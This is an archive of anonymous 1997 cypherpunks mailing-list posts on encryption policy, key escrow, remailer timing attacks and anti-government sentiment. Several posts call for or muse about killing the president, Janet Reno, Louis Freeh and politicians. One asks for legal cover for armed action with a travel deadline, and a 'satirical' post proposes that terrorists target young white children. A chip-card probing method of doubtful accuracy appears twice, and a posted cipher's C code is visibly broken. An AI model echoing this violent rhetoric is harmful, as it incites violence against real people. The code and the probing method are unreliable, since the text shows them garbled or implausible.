toto at sk.sympatico.ca is currently offering a suitcase, for a mere
$1,000,000 which should guarantee your privacy. simply let the
proper authorities know that you have the suitcase in your
possession, and they will recognize you as a compatriot and leave
you alone.

@_date: 1997-09-12 09:17:02
@_author: Anonymous 
@_subject: Freeh says FBI doing great, supports Weaver killer 
I'll ask around at alt.threaten.the.president, but they seem to have
lost a lot of posters, even though the group is only a week old.

@_date: 1997-09-12 10:37:32
@_author: Anonymous 
@_subject: Information Please 
I am interested in researching possible legal grounds for taking armed
action against politicians governments and law enforcement agencies.
I would appreciate any pointers anyone might be able to provide to any material of this nature.
Of particular interest would be information as to the application of
International law in this area.
I am assuming of course that there must be some form of law somewhere
which recognizes the right to resist oppression and violation of human
rights by any government elected or not.
Thank you.
ps If possible I would like to receive this information before
   September 16th 1997 as it is a two day drive to southern    California and I would like at least one day to rest.

@_date: 1997-09-12 11:03:24
@_author: Anonymous 
@_subject: Reno and Freeh to be assassinated! 
I think we should all send Chairman Goss a letter of appreciation for
his offer to assassinate Child Murderer Janet Reno and Murderer Louis
Freeh. Most politicians are too cowardly to promise strong actions such
as this.
Chairman Goss is also going to prosecute the employees of the CIA as
It is good to finally see someone taking a strong stance in this regard.
What a wonderful, wonderful man. He is probably a good husband and
father too.

@_date: 1997-09-12 11:37:05
@_author: Anonymous 
@_subject: Forwarding of Federalist Papers from Canada for U.S. Citizens promoting democracy 
I think we should all send a copy of the Federalist Papers to Sadaam
Hussein. It would be the American thing to do.
I am certain we can trust Six not to mix up the addresses with no
instructions and no requests meant for forwarding the Federalist
Papers with the addresses with no instructions and no requests meant
for forwarding strong encryption.

@_date: 1997-09-12 12:25:07
@_author: Anonymous 
@_subject: Bean Counting 
After giving careful consideration to the amount of press coverage
dedicated to the bombing of the Oklahoma City Federal Building, and judging the proportion of outrage over the deaths of the children in
the daycare center compared to the amount of outrage over the remaining
victims, I have come to the conclusion that in the interests of saving
lives terrorists and psychos should be encouraged to murder the youngest
children possible.
  While my studies are preliminary, they indicate that terroists and
madmen would only have to kill half as many people to achieve comparable
results in the arena of publicity and public attention if they were to
confine their slaughter to young children. This figure declines further
if the children are white, and even further yet if they are cute.
  By promoting cute young white children as the target of preference
for terroists and crazy people, we could save innumerable lives each
and every year.
Next Week: The role of Senior Citizens in slow check-out lines.

@_date: 1997-09-12 13:43:36
@_author: Anonymous 
@_subject: No Subject 
It is quite probable that this has been said before.  In case it hasn't,
however, I feel compelled to point out that mandatory key escrow/recovery
could likely mean an economic disaster of unimaginable proportions.    Okay, key escrow, whether by the goobermint or a contracted third-party,
is beginning to scare the living crap out of me.  Okay, let's assume that
the ammended SAFE passes and is promptly signed into law(despite what the
administration says, I don't think anyone believes for a second that it
would be signed without hesitation). It's a simple matter for the Commerce
Dept. to modify their review criteria to specify that the key
escrow/recovery feature be enabled and that the end user not be able to
disable it.
   This obviously doesn't affect anyone who can get their hands on the
source and comment out a line or two, but think about what happens with
big corporations, especially financial ones.  It's highly likely that a
good number of them will use crypto software just the way Big Brother
would like them to, happily sending their keys off so that our friends in
Washington can keep them nice and safe.
   Now think about this:  You're Joe Random Govt. Worker at the official
secret key repository, and there's a budget crisis going on - instead of
paychecks, you're getting I.O.U.'s.  Your terminal has access to
thousands, perhaps millions, of secret keys.  You grab one of CitiBank's,
forge a few transactions, and 30 seconds later your Swiss bank account is
a few million dollars fatter and according to the digital signature, the
transaction originated in L.A..
   Of course, one doesn't even have to be an underpaid govt. worker to
join in on the fun.  Just find a buffer overflow in the key repository's
daemon software and trick it into tacking on a few secret keys with its
"Big Brother thanks you for your cooperation." packet.  Considering that
even the CIA can't keep their severs secure, why should ANYONE, even
thouse naive enough to trust the govt. to respect their privacy, ever
trust such a corrupt and insecure organization with their encyption keys.
   Along the same lines, it's almost certain that someone is eventually
going to fat-finger some code and keys are going to get sent in the clear,
posted publicly, or something equally bad - with the government running
the "key management infastructure", it'll probably be a 12 year old kid
who got bored with Minesweeper who causes the global economic collapse.

@_date: 1997-09-12 14:02:04
@_author: Anonymous 
@_subject: 3% to Freedom 
Just heard a Canadian MP state that he was voting in favour of gun
registration because 52% of his constituents were in favor of it.
Killing 3% of the people to save the rights of 48% of them seems like
a fair trade-off to me.
We could kill them with hammers until we killed enough that they passed
hammer registration laws. Then we could switch to scissors. Then forks.
Then rocks.
Of course, it would be impossible to bust all the people who were in
possession of unregisterd rocks in their yards, so they would probably
have to use selective enforcement against just blacks and longhairs
and the like.
Am I ready to run for public office, or do I need to get stupider?
If so, then I propose that we start killing people by filling their
mouths with dirt, then we can pass dirt registration laws. Then we can
kill people by filling their lungs with air until they burst and we
can pass air registration laws. Then we can leave people out in the
sun until they die and pass sun registration laws.
"The reason I pulled you over, guys, is because the sun came up. Unless
one of you cops to possessing it, I'm going to have to take you all in."
Am I stupid enough to be a cop, now?
If not, then we can kill people by taking them to the roofs of buildings
and throwing them to the ground. Then we can pass roof and ground
registration laws.
"Hey, pal. Your feet are on the ground. You got a permit?"
"Sorry pal, this permit is for a different piece of ground. I'm going
to have to take you in. And, since the sun is out, you're going to get
an extra five years for possession of the sun in the commission of a

@_date: 1997-09-12 14:11:14
@_author: Anonymous 
@_subject: Soldiers 
Is there a small country that a thousand of us could go to and get citizenship and then have the country declare war on the U.S. after
we are all back in the country?
If a thousand of us could kill as many people as we could until we got
caught, then we could kill a lot of people who are bad for the country
and then once we're all caught the small country could surrender and
we would all have to be released as prisoners of war, right?
We could all be privates. They can't blame privates because they have
to follow orders.
The guys in the small country could make old guys who were dying soon
the leaders, and then when it was time to quit, they could overthrow
them and get US government aid. They could set the old guys trial dates
for two years down the road and then send them home to die.
I saw a guy get killed once and they told the guy who killed him that
he shouldn'a done it and they sent him home and said we'll call you
and then they took the dead guys sister to jail because she wouldn't
stop saying fuck.
When they were taking her away I told her she should kill the cops and
then go home and wait for them to call.
How about if we made a law that you had to kill the president and your
congressmen and senators and if you didn't you had to pay a $500.00 fine
every year? Do you think they would make sure we all made some money?
How about a law here you could kill any politician that forgot to call
you sir or ma'am? Or who forgot your birthday?
We could save a lot of money just by putting all the politicians who are
running for office on a stage and then killing them at random until we
had the right number left. Then they would have to think about if they
really wanted it.
How about if we let people be elected on a first-come first-serve basis
but then we could vote to kill them any time we wanted. Think they would do things to make us not want to kill them instead of the other
way around like it is now?
How about if we killed all of them and just pretended there was someone
running the country. Is that a good idea?

@_date: 1997-09-12 16:33:48
@_author: Anonymous 
@_subject: Please don't KILL THE PRESIDENT 
Youth In Asia Society:
At our last monthly meeting, we discussed all of the reasons there are
not to KILL THE PRESIDENT.
We think it is our duty to inform people of our objection to those who
believe it is necessary to KILL THE PRESIDENT.
We also object to people who are constantly running around, shouting,
incessantly, "KILL THE PRESIDENT! KILL THE PRESIDENT! KILL THE PRESIDENT! KILL THE PRESIDENT! KILL THE PRESIDENT! KILL THE PRESIDENT! KILL THE PRESIDENT! KILL THE PRESIDENT! KILL THE PRESIDENT! KILL THE PRESIDENT! KILL THE PRESIDENT! KILL THE PRESIDENT! KILL THE PRESIDENT!"
We think that this is rude.
So we would ask you please not to KILL THE PRESIDENT!
We don't want you to KILL THE PRESIDENT!
We think it is inadvisable for you to KILL THE PRESIDENT!
We certainly hope that you won't KILL THE PRESIDENT!
We hope that no one you know decides to KILL THE PRESIDENT!
We are dedicated in our efforts to convince people not to KILL THE
We think that we will be successful in our efforts to convince
people not to KILL THE PRESIDENT!
We don't ask to be thanked for advising people not to KILL THE
Nor do we expect to be thanked for advising people not to run around
incessantly screaming "KILL THE PRESIDENT! KILL THE PRESIDENT! KILL THE
PRESIDENT! KILL THE PRESIDENT! KILL THE PRESIDENT! KILL THE PRESIDENT!
KILL THE PRESIDENT! KILL THE PRESIDENT! KILL THE PRESIDENT! KILL THE
PRESIDENT! KILL THE PRESIDENT! KILL THE PRESIDENT! KILL THE PRESIDENT!
KILL THE PRESIDENT! KILL THE PRESIDENT! KILL THE PRESIDENT! KILL THE
PRESIDENT! KILL THE PRESIDENT! KILL THE PRESIDENT! KILL THE PRESIDENT!
KILL THE PRESIDENT! KILL THE PRESIDENT! KILL THE PRESIDENT!"
That's why we post anonymously.
We're humble.

@_date: 1997-09-12 16:40:28
@_author: Anonymous 
@_subject: Damn Do-Gooders 
It's people like this that are ruining the country.
I wish this damn do-gooder would just let me kill them myself.
I hate owing people.

@_date: 1997-09-12 20:10:15
@_author: Anonymous 
@_subject: in defense on Lon Horiuchi 
Zooko Journeyman blathered:
As Tim and others have noted from time to time, one man's terrorist
is another man's freedom fighter.  A corollary to this is that one
man's policeman is another man's terrorist.  Calling Horiuchi - a
too that the Weavers weren't threatening anyone when they were
initially attacked/ambushed by the Feds - so in what way were the Feds fulfilling a "policeman" role?
In any case, it wasn't really my intention to "compare" the deeds of
Horiuchi and McVeigh.  I was merely noting that the defense of
Horiuchi by Herr Direktor Freeh could have been used nearly
verbatim in McVeigh's behalf.  As you've pointed out, though, there badge and gets paid by the taxpayers, which makes him a "policeman."

@_date: 1997-09-12 22:36:28
@_author: Anonymous 
@_subject: Not key escrow, key recovery 
(Underpaid clerk steals secret keys, etc.)
Wake up.  It's not key escrow, it's key recovery.  Every message will be
encrypted with a LEAF (law enforcement access field).  This is an additional
recipient who can decrypt the message.  No user or corporate secret
keys are escrowed.  You're working with yesterday's scenario.

@_date: 1997-09-13 01:18:28
@_author: Anonymous 
@_subject: SAFE 
Bible Revelations 13:17:
"And no man shall be able to buy or sell without the mark of the

@_date: 1997-09-13 04:54:08
@_author: Anonymous 
@_subject: Sorry, Tim / Re: Snuffle Destroys United States: Film at 11 
Sorry I called you senile (even though I enjoyed it), since it turns
out that I was too senile to respond to your "can they do this? can
they do that" post with as good an example as above, as to what the
government can and cannot do.
After Pat Robertson becomes President, we can look forward to "Marilyn
Manson" having his/her 'encryption' fall under the ITAR and EAR rules,
regulations, restrictions, etc., etc., etc.

@_date: 1997-09-13 11:09:28
@_author: Anonymous 
@_subject: Bean Counting II 
That's like asking, "If the feds get what they want, how many more churches
will they burn, and how many more families will they shoot in the woods?"
The answer is nobody knows.  But judging from from history it seems that
when they feds are allowed to do whatever they want, innocent people often
get killed.
A better question to ask is how many more people will die before we do
something about the corrupt federal agents.

@_date: 1997-09-14 05:28:13
@_author: Anonymous 
@_subject: NoneRe: TAMPERPROOFING OF CHIP CARDS 
One other option for non-destructive reverse engineering is to drive Vcc
with high frequency AC and measure the resonant frequencies on the chip. (Same is true for the ground pins, but this is complicated because the
substrate is often grounded and introduces a large capacitance) This produces a general `map' of the chip, although many of the
frequencies will overlap and be indistinguishable.  To remove the unwanted
noise, it is necessary to damp out the parts of the chip that you're not
interested in.  There are a variety of ways to do this but the one of the
easiest is with the magnetoresistance effect.  Disk drive rw heads work
well for this. (it's usually better to magnetize the whole chip and then
unmagnetize the part you want to look at.) Input pins are most likely connected to an insulated gate, but this will
act like a capacitor, allowing ac into the channel, so we can probe these
to see where they go.  Newer chips have filters on the inputs which makes
this more difficult. once you have selected a target area, turn on the transistor(s) by any of
the usual methods (uv light, electron beam, external e-field...if you're
poor you could try pumping the substrate to induce latch-up, though this
isn't very `selective' in what it turns on) Two main problems with this techinque:  One is that the relevant
resonances are on the order of 10-100 GHz.  Obviously you are not just
going to plug that into your average scope and expect it to work.  The
usual advice is to maintain a reference oscillator and measure the
interference with respect to your `probe'.  If you have access to some of
the newer GaAs amps, you can modulate the signals and then measure the
lower sideband. The other problem is the finite resolution (even if you have a really good
magnetic head you just can't get close enough to the surface without
destuctive techniques.)  To a large degree, you have to `brute force'
guess, and see what model best fits the data.  I shouldn't have to explain
the details of this technique to a group of cryptographers.

@_date: 1997-09-15 08:58:19
@_author: Anonymous 
@_subject: Federal motivation 
Perhaps we can elaborate on this.  Judging from their actions, what
they want is a full blown police state.  They've seen the product, now
they want one of their own.  This is obvious to everybody on this
list, but sometimes people are coy about it, probably in an effort to
appear to be "legitimate".
This transcends the issue of crypto, although the problem will be more
manageable if the use of crypto remains legal.
What we are seeing is the fight for survival of the institutions
created during World War II.  Their only purpose now is self
promotion.  This was universally recognized ten years ago when the
Wall fell, but somehow the "peace dividend" never materialized and
they got another trillion dollars out of us.
We can look at Russia and see just how hard it is for a society to
free itself of these sorts of institutions.  How much of the Russian
"Mafia" is composed of fragments of the KGB?  This story can be read
again and again throughout history.
What is different in 1997 is that the technology of mass surveillance
and population management is superior.  What is at stake is whether we
remain a free people or whether we end up with ear tags like cattle.
Monty Cantsin
Editor in Chief
Smile Magazine

@_date: 1997-09-15 15:35:03
@_author: Anonymous 
@_subject: NoneRe: TAMPERPROOFING OF CHIP CARDS 
One other option for non-destructive reverse engineering is to drive Vcc
with high frequency AC and measure the resonant frequencies on the chip. (Same is true for the ground pins, but this is complicated because the
substrate is often grounded and introduces a large capacitance) This produces a general `map' of the chip, although many of the
frequencies will overlap and be indistinguishable.  To remove the unwanted
noise, it is necessary to damp out the parts of the chip that you're not
interested in.  There are a variety of ways to do this but the one of the
easiest is with the magnetoresistance effect.  Disk drive rw heads work
well for this. (it's usually better to magnetize the whole chip and then
unmagnetize the part you want to look at.) Input pins are most likely connected to an insulated gate, but this will
act like a capacitor, allowing ac into the channel, so we can probe these
to see where they go.  Newer chips have filters on the inputs which makes
this more difficult. once you have selected a target area, turn on the transistor(s) by any of
the usual methods (uv light, electron beam, external e-field...if you're
poor you could try pumping the substrate to induce latch-up, though this
isn't very `selective' in what it turns on) Two main problems with this techinque:  One is that the relevant
resonances are on the order of 10-100 GHz.  Obviously you are not just
going to plug that into your average scope and expect it to work.  The
usual advice is to maintain a reference oscillator and measure the
interference with respect to your `probe'.  If you have access to some of
the newer GaAs amps, you can modulate the signals and then measure the
lower sideband. The other problem is the finite resolution (even if you have a really good
magnetic head you just can't get close enough to the surface without
destuctive techniques.)  To a large degree, you have to `brute force'
guess, and see what model best fits the data.  I shouldn't have to explain
the details of this technique to a group of cryptographers.

@_date: 1997-09-16 10:32:51
@_author: Anonymous 
@_subject: Adam Back in British Science Journal 
When the British Science Journal asked readers to
recommend redesigns of the human body, one imaginative
soul said he'd like the esophagus separated from the
trachea with different apertures so he could drink a yard
of ale and sing "God Save the Queen" at the same time.

@_date: 1997-09-17 02:23:57
@_author: Anonymous 
@_subject: (Fwd) Cuban terrorist used encrypted phone (fwd) 
Had he said, "Nuke Havana.", he would be a freedom fighter.
 Had he said, "Nuke D.C.", he would be a Freeh->Dumb Fighter.

@_date: 1997-09-17 03:19:57
@_author: Anonymous 
@_subject: Sen. DiFi in the Merc 9/15 - Same old Same old 
Bill Stewart wrote, quoting DiFi:
Imagine how many tragedies could have been prevented if we had a
telescreen in every home and office.  Not just bombings, but murders,
spousal abuse, child abuse, drug use, uninformed political
People have been making bombs and blowing things up for about 100
years.  Until now this has been a manageable problem without mass
surveillance.  What happened?  Did the price of fertilizer drop?
Monty Cantsin
Editor in Chief
Smile Magazine

@_date: 1997-09-17 10:41:27
@_author: Anonymous 
@_subject: Court proceedings under new SAFE act 
> > >secret court that has never denied a request for a wiretap)
  Also, you are not likely to see a FISA judge's name on a warrant.
Instead, you will see warrants by regular judges which are backdated
to dates such as, say...March 28 at 9:02 a.m.
  There are a variety of court systems within which they have the clerks
regularly 'skip' certain document numbers, leaving them with hard to
trace back-dated paperwork capabilities.
  This is a 'Democracy', which is why, in addition to secret police,
we also have 'secret judges', and 'secret executioners'. (Do we also
have 'secret voters'?)
Anonymous Cypherpunks Chief Spokesperson

@_date: 1997-09-17 19:11:36
@_author: Anonymous 
@_subject: E-Cash 
Tim May has been a source of endless embarassments to his sympathizers on and off the net.
      Tim May
    /-+-- --+X
   />        <\

@_date: 1997-09-18 07:15:13
@_author: Anonymous 
@_subject: Summary of FBI talk @ MIT, Sept 10 
Summary of FBI talk held September 10, 1997 7-9p.m. Room 395 MIT E-51     ---- HES [Heidi Schmidt]  hschmidt at phx.com Note: I did not write down Steves' address but you can get it from the site. :)
Concepts discussed regarding cybercrime....
T.O.E  (Tool, Object, Evidence)
       Tool-- You are used to get to the target
       Object-- You are the target
       Evidence -- Evidence of the crime
C.I.A  ( all pertaining to data and your rights to have the following...)
       Confidentiality of data        Integrity  of data        Availability of data
The url for Subsection 1030. Fraud and related activity in connection with computers
This subsection protects three types of computers within institutions:
1) Financial based institutions using computers
2) Governmental based institutions using computers
3) Foreign commerce or Interstate commerce transaction based institutions    using computers The url for Computer Crime and Intellectual Property Section CCIPS
Contact information for CSI telephone: 415 905 2370
Since spam and other security issues cropped up as sub topics I am mentioning other urls that
may prove helpful in the long run.
Additional sites of interest regarding security and spam:
Web security
Sage resources (including security)
These are only but a drop on the planet, but they are a start.
The next announcement will be regarding the development of the BBLISA web site currently beign hosted at  Heidi Schmidt
hschmidt at phx.com
UNIX Systems Administrator-Webmistress
The Boston Phoenix Media Communications Group
Send mail for the `bblisa' mailing list to `bblisa at bblisa.org'.
Mail administrative requests to `majordomo at bblisa.org'.

@_date: 1997-09-19 10:30:39
@_author: Anonymous 
@_subject: y2k as ideological opportunity 
Blanc wrot:
A recession?  Say that 20 million people figure out that they don't
have to pay their taxes.  Those 20 million will stay wealthy.  The 25 million people employed by the federal govt in some parasitic
capacity or another will find themselves without enough money to go
So, that means the FBI, DEA, BATF, Secret Service, Treasury and all
the other heavily armed, officially sponsored gangs can't feed their
habits.  They look at their badges and weapons and they get hard-ons
and decide to extort more money from the drug traders.  Only now they
want 50% instead of the 25% they take today.
Net result:  the street price of drugs will rise, causing more crime.
It'll be anarchy in the streets.  Look for Tim May carrying this sign:
    +--------------------+
    I Told You      |
  The End Was Near  |
  Seven Years Ago,  |
 Check The Archives |     +---------++---------+
The only hope for America?  Buy more drugs to keep the traders cash An artificial drug-induced happiness will descend upon the land, and
we all reelect Gore in 2004, because we're STILL STUPID SHEEPLE.  THE
DRUGS WON'T HELP!
Some things will never change.

@_date: 1997-09-19 15:42:01
@_author: Anonymous 
@_subject: politics aren't all or nothing 
Sameer and the Dark Allies:
                        This alert brought to you by
The Voters Telecommunications Watch, The Center for Democracy &
              the Electronic Frontier Foundation, Wired Magazine,
                        and Americans for Tax Reform

@_date: 1997-09-19 15:42:12
@_author: Anonymous 
@_subject: New Computer Security Act 
Better to call Declan first...
  Everything is tried in the press these days. The courts are merely
an anachronism waiting to be declared dead when Court TV replaces
the Department of Justice.
 (Rumor has it that Janet Reno will be 'turning the letters' as the
  defendants try to guess their sentence.)

@_date: 1997-09-19 16:05:08
@_author: Anonymous 
@_subject: Preparing the Remnant for the far side of the crisis 
Letters of marque and reprisal are not generally considered to be tax
collection instruments as the targets were not usually considered
legitimate sources of tax revenue in time of peace.  (Still, Tim would
probably argue that there is no meaningful distinction.)
A stronger analogy could be made to tax collection groups such as the
Farmers General in pre-revolutionary France.  Entrepreneurs could
obtain a franchise to collect taxes for the King, receiving a fraction
of the taxes collected.  My guess is that these franchises were both
purchased and granted outright.
The Farmers General were unpopular and they didn't fare well during
the Revolution.  On May 8, 1794 (Floreal 19, Year II), 27 of these
scoundrels were executed in Revolution Square, including one Antoine
The IRS does privatize some of its work in the sense that bounties are
available for informants.  They get a percentage (~10%) of the tax
revenue "recovered".  The percentage drops rapidly as the total take
Monty Cantsin
Editor in Chief
Smile Magazine

@_date: 1997-09-20 08:18:40
@_author: Anonymous 
@_subject: Freeh peachs / Re: directed speech free? request for opinions. 
If their answer is in regard to a speech by Freeh, then it would be
free speech about free speech about a Freeh speech.
  If not, it would be about Freeh-free free speech.

@_date: 1997-09-22 06:08:35
@_author: Anonymous 
@_subject: Fwd: Re: Quor's cypher 
This is a really nifty encryption program.  It runs about half the speed
of rc4, but seems much more secure.
--- Forwarded Message:
implementation despite their inherent weakness against known-plaintext,
ciphertext-modification, and key-reuse attacks.  The algorithm described
below provides a more secure alternative for encrypting data eight bits
at a time, which, while maintaining a simple self-inverting architecture,
provides resistance to the aforementioned attacks, and features a large
keyspace, small code size, back traffic protection, and resistance to
timing attacks and differential cryptanalysis. */
 unsigned char a,b,c,state[256];
unsigned char q(unsigned char i)
  static unsigned char a0,a1,b0,b1,c1,c2,c3,c4,o,d1,d2,d3,d4;
  a0=state[a];
  a1=state[a0];
  b0=state[b];
  b1=state[b0];
  c1=i^(0xAA&state[(i&0x55)^a]);
  c2=c1^(0x55&state[(c1&0xAA)^b]);
  c3=c2^(a+b)^(a0+b0);
  c4=c3^(0x55&state[(c3&0xAA)^b]);
  o=c4^(0xAA&state[(c4&0x55)^a]);
  d1=i&o
  d2=i^o;
  d3=c2&c3
  d4=c2^c3;
  state[c&=255]^=a^d4;
  state[c^0x80]^=b^d4;
  a+=d1+b1+1;
  b^=d2^d3^a1;
  c++;
  return(o);
void setkey(unsigned char *key, int len)
  int x;
  a=b=c=0;
  for(x=256;x--;state[x]=0);
  for(x=0;x0)
    putchar(q(byte));

@_date: 1997-09-22 18:45:25
@_author: Anonymous 
@_subject: "Matchcode" technology sparks privacy flames..... 
We do, we just like to phrase it differently.  Such as "if you aren't using
remailers, they're gathering information about you."
Consider yourself informed that a third party has gathered the above
information about you.

@_date: 1997-09-22 21:23:49
@_author: Anonymous 
@_subject: Your mail 
<---- Begin Forwarded Message ---->
Sorry to do this to you. This is a love chain letter.  Within 5 days you
<----  End Forwarded Message  ---->

@_date: 1997-09-23 08:10:55
@_author: Anonymous 
@_subject: Persistent Persona 
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2
-----END PGP PUBLIC KEY BLOCK-----

@_date: 1997-09-24 02:00:12
@_author: Anonymous 
@_subject: Random character stereograms and stego 
Here's an application which is well suited for steganography.  This is
a random-character stereogram.  Look at it with a monospace font and
unfocus your eyes so the two blocks of text merge, and you will see
the message HI displayed:
VGhpcyBpcyBhIHRlc3Qg  VGhpcyBpcyBhIHRlc3Qg
bWVzc2FnZSB3aGljaCBp  bWVc2AFnZB3xaGljaCBp
cyBiZWluZyBzZW50IHZp  cyBZWmluZBzvZW50IHZp
YSBzdGVnYW5vZ3JhcGh5  YSBdGVnYW5v9Z3JhcGh5
LgpIYWQgdGhpcyBiZWVu  LgpYW1QgdhpBcyBiZWVu
IGFuIGFjdHVhbCBtZXNz  IGFIGoFjdVhXbCBtZXNz
YWdlLCBpdCB3b3VsZCBo  YWdlLCBpdCB3b3VsZCBo
YXZlIGJlZW4gZW5jcnlw  YXZIGJlZW4vgZW5jcnlw
dGVkCnVzaW5nIGEgbWV0  dGVkCVzaUW5nIGEgbWV0
aG9kIHdoaWNoIHByb2R1  aG9kIdoa4WNoIHByb2R1
Y2VzIG91dHB1dCB3aGlj  Y2VzI91dAHB1dCB3aGlj
aCBpcyBpbmRpc3Rpbmd1  aCBcyBpbmRnpc3Rpbmd1
aXNoYWJsZQpmcm9tIHJh  aXNoYWJsZQpmcm9tIHJh
bmRvbSBieXRlcy4K      bmRvbSBieXRlcy4K
This was just done manually, so it's pretty crude.  It would be easy
to write a program to display any message desired.  People could get
in the habit of sending long vertical stereograms saying "GO GIANTS"
or "MICROSOFT SUX" or whatever they felt like at the moment.  The
program could either generate its own random numbers or else suck
in random data from a disk file.
In this case, if you take the left block and reformat it so that it can
be base64 decoded, you will see a short message.  (Unix users can
pass the left block through "mimencode -u".)  In a real stego
application the message would be encrypted in 'stealth' form so it
was indistinguishable from random bits to anyone who did not hold
the decryption key.
This could even catch on as a legal "thumb your nose at the spooks" fad,
people adding random sterograms at the end of their messages.  You
could even have an active .sig which had a constant message but used
different random characters each time.  They wouldn't actually be sending
anything but there would be no way to be sure.
Some people say they'll just forbid transmitting data that looks random,
but realistically, that would be very unlikely to happen.

@_date: 1997-09-25 01:53:50
@_author: Anonymous 
@_subject: CypherPunk Action Project #128 
Write a decent ISP monitoring tool and send it to all LEA's so that
they don't FOOBAR my ISP and my account everytime they shit their cute
little panties when I send out my !!!DEATH THREAT!!! emails to Congress
(and a President to be named later).
Or, in the alternative:
Support GAK and VHM (Video Home Monitoring) on the condition that they
let CypherPunks write the code so that we can at least keep the system
functioning smoothly until they come for us.
('Old saying' of the future:
 "When Kent Crispin was Fuhrer, the email ran on time." )

@_date: 1997-09-25 02:03:08
@_author: Anonymous 
@_subject: Not that I'm a troublemaker... 
[I apologize if you have received this email in error. If you do not
 wish to receive further email from the Electronic Forgery Foundation
 then please send an email to "cypherpunks at toad.com" with a Subject
 heading that says, "I Voted For Strong Crypto!"]
You should be careful before you do foolish things like making a death
threat because it can have really bad results.

@_date: 1997-09-26 03:55:22
@_author: Anonymous 
@_subject: Crypto-victory in Commerce; Oxley talks about nuking Congress 
Or another Lusitania.  The German government during World War I had a
policy of sinking any ship carrying armaments to Britain.  While the
Lusitania was a civilian ship, the allies were secretly loading it
with ammunition.  This was known to the German government which
announced that it would attempt to sink the ship.  This was advertised
in New York newspapers by the German embassy in the weeks before the
Lusitania's departure.
The German torpedo appears to have set off the munitions in the hold
which caused the ship to sink more quickly, magnifying the loss of
life.  Ironically, while the allies were responsible for using the
civilians on board as shields, the Germans were held responsible for
the deaths.  This was used as a propaganda tool to persuade the
American people that the country should enter World War I.
By an odd coincidence, Franklin Roosevelt and Winston Churchill worked
together on the Lusitania project, foreshadowing their later work
Many U.S. wars have started with similar incidents.  The
Spanish-American War started when a U.S. naval ship (The Maine) blew
up in Havana harbor.  Curiously, no officers were on board at the time.
Some suspect Pearl Harbor was managed to maximize the shock of the
American people.  There was also an incident in the North Atlantic
with a German ship which was used to justify U.S. involvement in the
European war.
And let's not forget the Gulf of Tonkin incident which prompted the
Congress to grant the President sweeping powers.
The only real question is whether the stakes are high enough at this
time to justify some sort of provocative incident.  It seems
reasonable that the bureacracies of Russia and the United States would
recognize their common interest against the people of both countries
and the whole world.
Monty Cantsin
Editor in Chief
Smile Magazine

@_date: 1997-09-26 06:18:40
@_author: Anonymous 
@_subject: Remailer Attack 
According to Raph's remailer stats, the remailers have widely varying
latencies.  Given that only a few remailers have latencies which are
acceptably low, the list of usable remailers is quite low.
If the user of the remailer, Monty Cantsin for example, signs his
messages, a fairly accurate measure of total transit time is obtained.
The total transit time gives clues to the remailers which were
actually used in the chain.  In an of itself, this may not comprise
the user, but combined with other weaknesses it will cause the
attacker to be significantly more confident of identification
The remailers should all have about the same latency.  0 seconds seems
like a good Schelling point.  What would it take to reduce remailer
latency to under 60 seconds for most of the remailers?  Do people need
old 486s to dedicate to the task?  Do they need money?  Better
If you operate a remailer, please tell us what you need to make it
really work well.  Perhaps the rest of us can help make it happen.
Monty Cantsin
Editor in Chief
Smile Magazine

@_date: 1997-09-26 06:37:44
@_author: Anonymous 
@_subject: Why the White amendment is a good idea 
**BZZZT** WRONG ANSWER!
How loudly do we have to shout it?
**CONGRESS DOES NOT SUPPORT THE CONSTITUION.  PERIOD.**  They prove it time and time again.  Recent example:  they wouldn't have
passed the CDA 94-6! if they were worried about the Constitution.
You call the congressvermin "spineless".  They do hate that label, and
voting "tough on crime, tough on drugs," is how they avoid it.  With
Lying Freeh telling them that evil Mexican drug lords use crypto to
outclever the FBI (true), and therefore a vote for GAKked crypto is a
vote that's tough on crime (false), they can't rush to vote "yea" fast
enough.  It doesn't matter if the vote doesn't make sense, or violates
the Constitution eight ways from Sunday, the vote is there only to provide the illusion to the voters:  "Hey, I'm TOUGH on CRIME."
You better learn that Congress is not there to support the Constitution.
Any part of it.  It's not in the part of their job description that gets
them reelected.  Constitutional issues do NOT attract voters.  Only SIX
senators voted against the Telecom Reform Act, the one that contained
the CDA.  My senator is one of them, and I know that he is a lame duck not
seeking re-election.  So, don't go dangling Constitutional challenges in
front of Congress.  There's not enough bait on that hook.
Fighting unemployment attracts voters.  Fighting crime attracts voters.
But they couldn't trample hard enough on our freedom of speech when the voters
heard about child porn on the net.  And now that evil Mexican drug lords use
encryption, well, I'll let you connect the last two dots.
We can't afford to simply frame the debate on Constitutional issues.  The
number of voters looking at them through that frame won't get them reelected.
Shame on us cowardly Americans.  (Yeah, _us_.  I'm hiding behind a remailer.)

@_date: 1997-09-26 10:43:22
@_author: Anonymous 
@_subject: Plea from a parent who wants to keep their kid free of SSNs 
Declan forwards us:
"And dang it, all the ones around here start with 666."
You have the right not to get SSNs for your kids. However, by doing that,
you give up the opportunity to slork a chunk of your money back out of the
U.S. Treasury. But hey, There Ain't No Such Thing As A Free Lunch.
Think of it as a Freedom Tithe. It probably pisses the Gub'mint off MORE
knowing that you'd rather pay than knuckle under. Of course, as the saying
goes: "once you pay Danegeld, you'll never get rid of the Dane."
Anyway, it doesn't matter for shit. Many records nowadays are also indexed
by name and date of birth, and they collect that stuff from everywhere.
They know who you are (had to file that birth certificate) and where you
live (property records and voter registration information). In the Land Of
The Freeh, your kids are already tagged, bagged, and waiting to be
fingerprinted and photographed.
Next step: ID transponders, so the cops can retroactively arrest 'em for
being in the vicinity when mayhem happened to occur. The only question is
whether it'll be the fascists on the Left (pushing the "make everything
safe for everyone" agenda) or the fascists on the Right (pushing the "get
tough on crime and damn everything else" agenda) who get the laws passed.
Either way, a little talc under that collar will keep it from chafing.

@_date: 1997-09-26 20:25:36
@_author: Anonymous 
@_subject: Barksdale editorial 
Washington May Crash the Internet Economy
By Jim Barksdale
The U.S. computer industry is the envy of of the world. But it may not be long before we are asking ourselves: Why did we let our dominance in the software business slip away to competitors in other countries? That could well be the consequence of encryption legislation proposed by FBI Director Louis Freeh and supported by key congressional Republicans and members of the Clinton administration.
Encryption is simply a mathematical way to scramble (encrypt) and unscramble (decrypt) digital information during transmission or storage. It is increasingly used to protect not just personal communications and medical and financial records, but also all the intellectual property businesses maintain on computer networks.
